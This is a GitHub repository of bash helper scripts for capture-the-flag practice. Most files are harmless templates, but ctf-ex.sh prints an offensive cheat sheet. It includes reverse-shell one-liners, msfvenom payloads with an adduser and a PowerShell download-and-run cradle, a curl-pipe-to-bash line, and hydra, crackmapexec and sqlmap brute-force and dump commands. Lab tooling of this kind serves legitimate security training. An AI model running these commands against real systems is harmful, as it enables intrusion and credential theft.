├── README.md ├── make.sh ├── scripts ├── ctf-connect.sh ├── ctf-ex.sh ├── ctf-py.sh ├── ctf-ssh.sh └── ctf-wordlist-names.sh └── solve.py /README.md: -------------------------------------------------------------------------------- 1 | # CTF-bash-tools 2 | Toolset for automating common management actions used in CTF's 3 | 4 | ## Tools 5 | - `ctf-py` to create a solve.py script 6 | - `ctf-connect ip port` to create a connect.sh script 7 | - `ctf-ex cmd` to see examples of a certain command 8 | - `ctf-ssh` to generate an rsa keypair for ssh login 9 | - `ctf-wordlist-names names-file` to generate a wordlist from first and last names 10 | 11 | ## Installation 12 | ```bash 13 | git clone https://github.com/PinkDraconian/CTF-bash-tools.git 14 | cd CTF-bash-tools 15 | ./make.sh 16 | source ~/.bashrc 17 | ``` 18 | 19 | ## Credits 20 | - Thanks to [OneMask](https://gitlab.com/onemask) for writing the ctf-wordlist-names bash code! 21 | 22 | ## Ending words 23 | Thanks for using these tools. 24 | Any recommendations, feature requests, and so on, are always welcome! 25 | -------------------------------------------------------------------------------- /make.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # 4 | # Script to add aliases for all the scripts to ~/.bash_aliases 5 | # Firstly, it will add all the aliases to ~/.bash_aliases 6 | # Then it will prompt the user to source ~/.bashrc or restart the terminal 7 | # 8 | 9 | echo " 10 | # Aliases for CTF-bash-tools (https://github.com/PinkDraconian/CTF-bash-tools) 11 | alias ctf-py=\"$(pwd)/scripts/ctf-py.sh\" 12 | alias ctf-connect=\"$(pwd)/scripts/ctf-connect.sh\" 13 | alias ctf-ex=\"$(pwd)/scripts/ctf-ex.sh\" 14 | alias ctf-ssh=\"$(pwd)/scripts/ctf-ssh.sh\" 15 | alias ctf-wordlist-names=\"$(pwd)/scripts/ctf-wordlist-names.sh\"" >> ~/.bash_aliases 16 | 17 | # Prompt user to source ~/.bashrc or restart the terminal 18 | echo "Aliases have been added! You can now use 19 | 'ctf-py' to create a solve.py script 20 | 'ctf-connect ip port' to create a connect.sh script 21 | 'ctf-ex cmd' to see examples of a certain command 22 | 'ctf-ssh' to generate an rsa keypair for ssh login 23 | In order to use these, either run 'source ~/.bashrc' or restart the terminal. 24 | If you upgraded the script, you can delete the old entries from ~/.bash_aliases" 25 | -------------------------------------------------------------------------------- /scripts/ctf-connect.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # 4 | # Script to create a connect.sh file that can be used to connect to a challenge 5 | # Firstly, it checks if there are cmd arguments, if not, it prints a help message 6 | # Then it checks if the connect.sh already exists 7 | # Then it creates the actual file 8 | # Lastly it makes it executable 9 | # 10 | 11 | # Help prompt for if no arguments are supplied 12 | if [ $# -eq 0 ] 13 | then 14 | echo "Usage: ctf-connect ip port" 15 | exit 1 16 | fi 17 | 18 | # Checking if connect.sh already exists 19 | if [ -f connect.sh ]; then 20 | echo "[!] connect.sh already exists." 21 | exit 1 22 | fi 23 | 24 | # Creating and filling file 25 | echo "#!/bin/bash 26 | 27 | nc $1 $2" > connect.sh 28 | 29 | # Making file executable 30 | chmod +x connect.sh 31 | -------------------------------------------------------------------------------- /scripts/ctf-ex.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #TODO: volatility/tcpdump/tshark/ssh/netcat/linux/recon-ng/links 3 | # Can display examples for how commands are structured 4 | # Following commands can be used 5 | # - curl 6 | # - hydra 7 | # - nmap 8 | # - gobuster 9 | # - tty (How to upgrade a shell to tty) 10 | # - john 11 | # - ping (Set up a ping listen) 12 | # - find 13 | # - pwntools 14 | # - sqlmap 15 | # - crackmapexec 16 | # - smbclient.py 17 | # - mount 18 | # Usage: ctf-ex 19 | # 20 | 21 | option=$(tr '[:upper:]' '[:lower:]' <<< "$1") # Convert command choice to lowercase 22 | 23 | if [[ $option == "-h" || $# != 1 ]]; then 24 | echo "Usage: ctf-ex 25 | Commands implemented 26 | - pwn 27 | - gdb 28 | - linux 29 | - msfvenom 30 | - wfuzz 31 | - reverse-shell 32 | - nmap 33 | - hydra 34 | - curl 35 | - gobuster 36 | - crackmapexec 37 | - tty 38 | - john 39 | - ping 40 | - find 41 | - pwntools 42 | - sqlmap 43 | - smbclient.py 44 | - mount" 45 | 46 | elif [[ $option == "linux" ]]; then 47 | echo "Enable logging record the interactive session 48 | script 49 | close script session 50 | ctrl + D 51 | check current shell 52 | echo $0 53 | all details about system 54 | uname -a 55 | view all process 56 | ps auxfww 57 | check open ports and services listening 58 | netstat -anp 59 | check defined hosts 60 | cat /etc/hosts 61 | check filesystem 62 | df -h 63 | check crontab 64 | crontab -l 65 | check initab 66 | cat /etc/inittab 67 | check shared memory 68 | ipcs -mp 69 | check the login activity 70 | last 71 | monitor network trafic 72 | sudo iftop 73 | investigate sockets 74 | ss -nlpt 75 | " 76 | 77 | elif [[ $option == "crackmapexec" ]]; then 78 | echo "Bruteforce smb 79 | crackmapexec smb 10.10.10.192 -u users -p pass 80 | Bruteforce winrm 81 | crackmapexec winrm 10.10.10.192 -u users -p pass" 82 | 83 | elif [[ $option == "gobuster" ]]; then 84 | echo "Enumerate directories on HTTP: 85 | gobuster dir --wordlist /usr/share/wordlists/dirb/big.txt --url [-x ] [-o ] 86 | Enumerate directories on HTTPS: 87 | gobuster dir -k --wordlist /usr/share/wordlists/dirb/big.txt --url [-x ] [-o ] 88 | Enumerate vhosts: 89 | gobuster vhost --wordlist /usr/share/wordlists/SecLists/Discovery/DNS/fierce-hostlist.txt --url " 90 | 91 | elif [[ $option == "tty" ]]; then 92 | echo "Fully upgrading to TTY shell 93 | python3 -c 'import pty; pty.spawn(\"/bin/bash\")' 94 | ctrl+z 95 | echo $TERM && tput lines && tput cols 96 | stty raw -echo 97 | fg 98 | export SHELL=bash 99 | export TERM=xterm-256color 100 | stty rows 24 columns 121 101 | Listner: socat file:`tty`,raw,echo=0 tcp-listen:4444 102 | Victim: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444" 103 | 104 | elif [[ $option == "john" ]]; then 105 | echo "Cracking hash 106 | john --wordlist=/usr/share/wordlists/rockyou.txt hash_file 107 | john the ripper, show the cracked passwords 108 | john ~/hash.txt --show 109 | john the ripper, continue session 110 | john --restore=session_name 111 | john the ripper over GPU, OpenCL formats, start session 112 | john --session=session_name --format=opencl ~/hash.txt 113 | " 114 | 115 | elif [[ $option == "mount" ]]; then 116 | echo "Mount a shared folder 117 | mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share" 118 | 119 | elif [[ $option == "ping" ]]; then 120 | echo "Setting up listener for pings 121 | tcpdump -i tun0 icmp and icmp[icmptype]=icmp-echo" 122 | 123 | elif [[ $option == "find" ]]; then 124 | echo "Finding a file and dismissing permission denied messages 125 | find / -type f -name \"keyword\" 2>&1 | grep -v \"Permission denied\" 126 | Finding all SUID and SGID files in the file system 127 | find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null 128 | Finding all readable by user files 129 | find / -type f -readable 130 | Finding all writable by user files 131 | find / -type d -writable 132 | Find all files with the word password in them 133 | find / -name '*{password}*' -print 134 | " 135 | 136 | elif [[ $option == "pwntools" ]]; then 137 | echo "Making a remote connection 138 | io = remote('ip', port) 139 | Setting debug mode 140 | context.log_level = 'DEBUG' 141 | Pattern generation 142 | cyclic(x) 143 | Pattern Finding 144 | cyclic_find(0xadress) 145 | URL encoding 146 | urlencode(\"string\") 147 | packing to big-endian 148 | pack(1, endian='big') 149 | loading ELF files 150 | e = ELF('/path/to/file') 151 | more details 152 | https://github.com/Gallopsled/pwntools-tutorial 153 | " 154 | 155 | elif [[ $option == "smbclient.py" ]]; then 156 | echo "Login 157 | smbclient.py DOMAIN/USERNAME:PASS@IP" 158 | 159 | elif [[ $option == "sqlmap" ]]; then 160 | echo "SQLi testing from saved request from burp 161 | sqlmap --level 5 --risk 3 --batch -r 162 | SQLi from GET request 163 | sqlmap --level 5 --risk 3 --batch -u 164 | SQLI for specefic parameters 165 | sqlmap --level 5 --risk 3 --batch -u --method \"POST\" --data=\"parm_1=value¶m_n=value\" 166 | GET SQL Shell 167 | sqlmap --dbms=mysql -u \"\" --sql-shell 168 | LIST all databases 169 | sqlmap -u \"\" --dbs 170 | LIST all tables in a database 171 | sqlmap -u \"\" -D site_db --tables 172 | Dump the contents of a DB table 173 | sqlmap -u \"http://testsite.com/login.php\" -D site_db -T users –dump 174 | List all columns in a table 175 | sqlmap -u \"http://testsite.com/login.php\" -D site_db -T users --columns 176 | Test on page that require login 177 | sqlmp --cookie=\"value=X\" -u \"http://testsite.com/sell.php 178 | Add headers to the query 179 | sqlmp --headers=\"header:value;header:value\" -u \"http://testsite.com/sell.php 180 | " 181 | elif [[ $option == "curl" ]]; then 182 | echo "POST parameters 183 | curl --data \"email=test@test.com&password=test\" 184 | Specify user agent 185 | curl -A \"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\" 186 | OUTPUT response header to stdout 187 | curl -i http://10.10.10.10/profile.php 188 | Follow redirect 302 189 | curl -L http://10.10.10.10/profile.php 190 | Pipe a remote script directly to bash 191 | curl -sSk \"http://10.10.10.10/linpeas.sh\" | bash 192 | Adding additonal headrs 193 | curl -H \"X-Header: value\" 194 | " 195 | 196 | elif [[ $option == "hydra" ]]; then 197 | echo "Brute windows RDP 198 | hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip 199 | Brute SMB users with rockyou 200 | hydra -L usernames.txt -P passwords.txt $ip smb -V -f 201 | Brute LDAP users with rockyou.txt 202 | hydra -L users.txt -P passwords.txt $ip ldap2 -V -f 203 | Brute HTTP GET login 204 | hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin 205 | Bute ssh on port 22 206 | hydra $ip -s 22 ssh -l -P big_wordlist.txt 207 | Brute ssh using list of users and passwords 208 | hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh 209 | Check more here: 210 | https://redteamtutorials.com/2018/10/25/hydra-brute-force-techniques/ 211 | " 212 | elif [[ $option == "nmap" ]]; then 213 | echo "Scan from predifined list 214 | nmap -iL list.txt 215 | scan top X ports 216 | nmap –top-ports X 192.168.1.1 217 | scan all 65535 ports 218 | nmap -p- 192.168.1.1 219 | scan a subnet 220 | nmap 192.168.1.0/24 221 | scan selected ports and ignore discorvery 222 | nmap -Pn -F 192.168.1.1 223 | scan using tcp connect 224 | nmap -sT 192.168.1.1 225 | aggressive service detection 226 | nmap -sV --version-intensity 5 192.168.1.1 227 | ligher banner grabbing detection 228 | nmap -sV --version-intensity 0 192.168.1.1 229 | Scan with a set of scripts 230 | nmap -sV --script=smb* 192.168.1.1 231 | use diminutive fragmented IP packets 232 | nmap -f 192.168.1.1 233 | Specify the size (need to be multiple of 16) 234 | nmap --mtu 16 192.168.1.1 235 | use firewall bypass script 236 | nmap -sS -T5 192.168.1.1 --script firewall-bypass 237 | list nmap scripts 238 | ls -la /usr/share/nmap/scripts/ 239 | " 240 | elif [[ $option == "reverse-shell" ]]; then 241 | echo "bash reverse-shell 242 | bash -i >& /dev/tcp// 0>&1 243 | netcat 244 | nc -e /bin/sh 10.0.0.1 1234 245 | ruby 246 | ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' 247 | php 248 | php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");' 249 | weevely web shell 250 | weevely generate 251 | weevely password 252 | " 253 | 254 | elif [[ $option == "wfuzz" ]]; then 255 | echo "URL brute forcing 256 | wfuzz -c -z /path/to/wordlist.txt --hc 404 http:///FUZZ 257 | GET params brute forcing 258 | wfuzz -c -z file,users.txt -z file,pass.txt --hc 404 http:///index.php?user=FUZZ&pass=FUZ2Z 259 | POST params brute forcing 260 | wfuzz -z file,wordlist/others/common_pass.txt -d \"uname=FUZZ&pass=FUZZ\" --hc 302 http://testphp.vulnweb.com/userinfo.php 261 | Encoding payloads 262 | wfuzz -z list,1-2-3,md5-sha1-none http://webscantest.com/FUZZ 263 | Fuzz custom headers 264 | wfuzz -z file,wordlist/general/common.txt -H \"myheader: headervalue\" -H \"myheader2: headervalue2\" 265 | " 266 | 267 | elif [[ $option == "msfvenom" ]]; then 268 | echo "List payloads 269 | msfvenom -l payloads 270 | List encoders 271 | msfvenom -l encoders 272 | windows meterpreter reverse-shell 273 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe 274 | windows create user 275 | msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe 276 | Execute commands 277 | msfvenom -a x86 --platform Windows -p windows/exec CMD=\"powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"\" -f python 278 | Encoding a reverse-shell with shikata_ga_nai 279 | msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe 280 | embedded reverse-shell inside exe 281 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe 282 | PHP reverse-shell 283 | msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php 284 | Python shell 285 | msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py 286 | Linux meterpreter bind shell x86 multi stage 287 | msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 288 | " 289 | 290 | elif [[ $option == "gdb" ]]; then 291 | echo "load the binary with args arguments 292 | gdb --args binary arguments 293 | Launch gdb with a process 294 | gdb --pid 295 | set arguments 296 | set args 297 | Launch the binary with stdin data 298 | r < <(perl -e 'print \"A\"x5') 299 | load a plugin inside gdb 300 | source 301 | Show values as hex 302 | p/x 10+12 303 | show shared libraries 304 | info sharedlibrary 305 | Check the registers 306 | info registers 307 | check value of a specified register 308 | $ 309 | show memory at given adress in hex 310 | x/x $esp 311 | show the instruction on eip 312 | x/i $eip 313 | check the break points 314 | info break 315 | set a break point in an Address 316 | break *Address 317 | delete all breakpoints 318 | clear 319 | remove a breakpoint 320 | delete 321 | disable a breakpoint 322 | disable 323 | Force the current function to return im-mediately, passing the given value 324 | return 325 | turn asm syntax to intel 326 | set disassembly-flavor intel 327 | step one machine code instruction 328 | stepi 329 | continue until current function return 330 | finish 331 | show the stack frame info 332 | info frame 333 | attach network process 334 | set follow-fork-mode child 335 | " 336 | 337 | elif [[ $option == "pwn" ]]; then 338 | echo "Check property of a binary_file 339 | checksec binary 340 | Check file type 341 | file binary_file 342 | Disassemble with intel syntax 343 | objdump -M intel -d program_name 344 | Output kernel message 345 | dmesg 346 | Display headers of an elf file 347 | readelf -l binary_file 348 | Display program sections size 349 | size binary_file 350 | Output dynamic realocation 351 | objdump -r binary_file 352 | Disbale ASLR 353 | echo 0 > /proc/sys/kernel/randomize_va_space 354 | " 355 | 356 | fi -------------------------------------------------------------------------------- /scripts/ctf-py.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # 4 | # Creates a solve.py file initialized with a 5 | # - Shebang 6 | # - Main function 7 | # - Calling the main function if __name__ == __main__ 8 | # It first will check if the file doesn't already exists to make sure we're not overriding anything. 9 | # Then it will create the file 10 | # Lastly, it will make the file executable 11 | # 12 | 13 | # Check if solve.py doesn't already exist 14 | if [ -f solve.py ]; then 15 | echo "[!] solve.py already exists." 16 | exit 1 17 | fi 18 | 19 | # Making the file 20 | echo "#!/usr/bin/env python3 21 | 22 | def main(): 23 | pass 24 | 25 | 26 | if __name__ == '__main__': 27 | main()" > solve.py 28 | 29 | # Making the file executable 30 | chmod +x solve.py 31 | -------------------------------------------------------------------------------- /scripts/ctf-ssh.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # 4 | # Script to create new ssh keypair (with empty password), set the correct permissions and tell the user where to upload them 5 | # 6 | 7 | # Checking if id_rsa already exists 8 | if [ -f id_rsa ] || [ -f id_rsa.pub ]; then 9 | echo "[!] id_rsa or id_rsa.pub files already exist." 10 | exit 1 11 | fi 12 | 13 | # Creating keypair 14 | ssh-keygen -t rsa -f id_rsa -P "" 15 | 16 | # Setting correct permissions 17 | chmod 600 id_rsa 18 | 19 | # Message for user 20 | echo " 21 | Put the public key in ~/.ssh/authorized_keys 22 | echo \"$(cat id_rsa.pub)\" >> ~/.ssh/authorized_keys 23 | 24 | Log in using 25 | ssh -i id_rsa user@ip" 26 | -------------------------------------------------------------------------------- /scripts/ctf-wordlist-names.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # 4 | # Gets a list with `firstname lastname` and formats them into the following: 5 | # NameSurname, Name.Surname, NamSur (3letters of each), Nam.Sur, NSurname, N.Surname, SurnameName, Surname.Name, SurnameN, Surname.N, 6 | # 7 | 8 | if [[ $ == "-h" || $# != 1 ]]; then 9 | echo "Usage: ctf-wordlist-names names-file" 10 | exit 11 | fi 12 | 13 | if [ -f formatted_name_wordlist.txt ]; then 14 | echo "[!] formatted_name_wordlist.txt file already exist." 15 | exit 1 16 | fi 17 | 18 | cat $1 | while read line; do 19 | firstname=$(echo $line | cut -d ' ' -f1 | tr '[:upper:]' '[:lower:]') 20 | lastname=$(echo $line | cut -d ' ' -f2 | tr '[:upper:]' '[:lower:]') 21 | echo "$firstname.$lastname 22 | $(echo $firstname | cut -c1).$lastname 23 | $(echo $firstname | cut -c1)-$lastname 24 | $firstname$lastname 25 | $firstname-$lastname 26 | $(echo $firstname | cut -c1-3)$(echo $lastname | cut -c1-3) 27 | $(echo $firstname | cut -c1-3).$(echo $lastname | cut -c1-3) 28 | $(echo $firstname | cut -c1)$lastname 29 | $lastname$firstname 30 | $lastname-$firstname 31 | $lastname.$firstname 32 | $lastname$(echo $firstname | cut -c1) 33 | $lastname-$(echo $firstname | cut -c1) 34 | $lastname.$(echo $firstname | cut -c1)" >> formatted_name_wordlist.txt 35 | done 36 | -------------------------------------------------------------------------------- /solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | def main(): 4 | pass 5 | 6 | 7 | if __name__ == '__main__': 8 | main() 9 | --------------------------------------------------------------------------------